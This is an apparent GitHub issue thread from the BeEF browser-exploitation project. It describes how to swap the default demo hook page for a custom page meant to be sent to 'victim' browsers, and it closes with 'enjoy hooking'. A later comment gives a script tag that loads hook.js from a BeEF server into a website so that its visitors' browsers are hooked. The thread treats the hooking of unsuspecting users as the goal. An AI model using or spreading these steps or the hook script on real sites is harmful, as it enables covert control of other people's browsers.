### ISSUE TITLE
changing the default hook page to user-defined hook page.

### ISSUE THREAD

**Issue by 17mrigank** [beefproject/beef#914]
hey as we all know the default hook page comes as index.html as http://-ip-:3000/demos/butcher/index.html now if we want to change it, we can easily do it. 
Lets say our custom page is user.html which we want to send to other browser(victims) so that they can be hooked. 
steps:-
1.)these pages like basic.html and index.html having pics of beef are present in beef/extensions/demos/html/butcher, all we need to do is add user.html into the butcher dir .  
2.) see the code of index.html and add the <Script> present in head section into user.html which says about the adding window.location.protocol and window.location.host. just copy paste the whole script and add into user.html 
3.) now go to opt/beef/extensions/admin_ui/media/javascript/ui/panel and open welcometab.js. This js code represent the welcome panel of our beef from where we open index.html .... now in welcometab.js search for the lines where ''basic version click here and advanced version click here'' is written.
into <a href= " demos/butcher/index.html" replace it with "demos/butcher/user.html" and save the file and exit.
4.) now restart the beef and backtrack and delete all the browser history.. means start from the begin.. do ./beef start beef and in the welcome panel go to the " click here" link 
5;) you'll see your user.html page as a hooking page.. send it to the victim browser and enjoy hooking. :)

**Comment by NetworkAdvisor** [comment]
I attempted to change the primary Html with my websites, now I cant even open up advanced hook . Any way i could run my website from advanced hook ?

**Comment by bcoles** [comment]
@NetworkAdvisor In your website, put `<script src="htts://beef.local:3000/hook.js"></script>`

**Comment by NetworkAdvisor** [comment]
Thanks you.

**Comment by BokiX423** [comment]
@NetworkAdvisor how to even make site? i tried and everytime fail
